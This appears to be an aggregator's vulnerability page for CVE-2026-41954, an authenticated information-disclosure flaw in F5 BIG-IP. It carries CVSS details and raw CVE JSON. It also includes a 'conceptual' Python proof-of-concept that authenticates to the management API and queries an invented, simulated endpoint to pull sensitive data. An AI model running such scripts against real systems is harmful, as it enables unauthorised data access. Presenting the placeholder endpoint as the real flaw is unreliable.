Security Vulnerability Report
CVE-2026-41954 CVSS 4.9 MEDIUM

CVE-2026-41954

Published: 2026-05-13 16:16:46
Last Modified: 2026-05-13 16:27:11

Description

Sensitive information disclosure vulnerability exists in the undisclosed iControl REST endpoint and TMOS Shell (tmsh) command which may allow an authenticated attacker with resource administrator role privileges to view sensitive information. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

F5 BIG-IP (all supported versions; see the vendor advisory K32950402 for the exact affected releases)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-41954 (Conceptual Example)
import requests
import urllib3

# The BIG-IP management interface commonly presents a self-signed certificate,
# so certificate warnings are silenced for this check.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def check_poc(target_ip, username, password):
    # F5 BIG-IP Management URL
    base_url = f"https://{target_ip}/mgmt"

    # 1. Authenticate to get the token
    auth_url = f"{base_url}/shared/authn/login"
    auth_payload = {
        "username": username,
        "password": password,
        "loginProviderName": "tmos",
    }

    session = requests.Session()
    session.verify = False

    try:
        print(f"[*] Attempting to authenticate as {username}...")
        resp = session.post(auth_url, json=auth_payload)
        if resp.status_code != 200:
            print("[-] Authentication failed.")
            return

        token = resp.json().get("token", {}).get("token")
        if not token:
            print("[-] Authentication response did not contain a token.")
            return

        headers = {
            "X-F5-Auth-Token": token,
            "Content-Type": "application/json",
        }

        # 2. Access undisclosed sensitive endpoint (Simulated)
        # Note: Replace with actual endpoint path if disclosed
        vuln_endpoint = f"{base_url}/tm/undisclosed/sensitive/config"
        print(f"[*] Sending request to vulnerable endpoint: {vuln_endpoint}")
        vuln_resp = session.get(vuln_endpoint, headers=headers)

        if vuln_resp.status_code == 200:
            print("[+] Successfully retrieved sensitive information!")
            print("[+] Data:")
            print(vuln_resp.text)
        else:
            print(f"[-] Request failed with status code: {vuln_resp.status_code}")
    except Exception as e:
        print(f"[!] An error occurred: {e}")


if __name__ == "__main__":
    TARGET = "<BIG_IP_IP>"
    USER = "resource_admin"
    PASS = "<PASSWORD>"
    check_poc(TARGET, USER, PASS)

References

https://my.f5.com/manage/s/article/K32950402 (vendor advisory, as listed in the CVE record below)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41954", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:45.600", "lastModified": "2026-05-13T16:27:11.127", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sensitive information disclosure vulnerability exists in the undisclosed iControl REST endpoint and TMOS Shell (tmsh) command which may allow an authenticated attacker with resource administrator role privileges to view sensitive information.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://my.f5.com/manage/s/article/K32950402", "source": "[email protected]"}]}}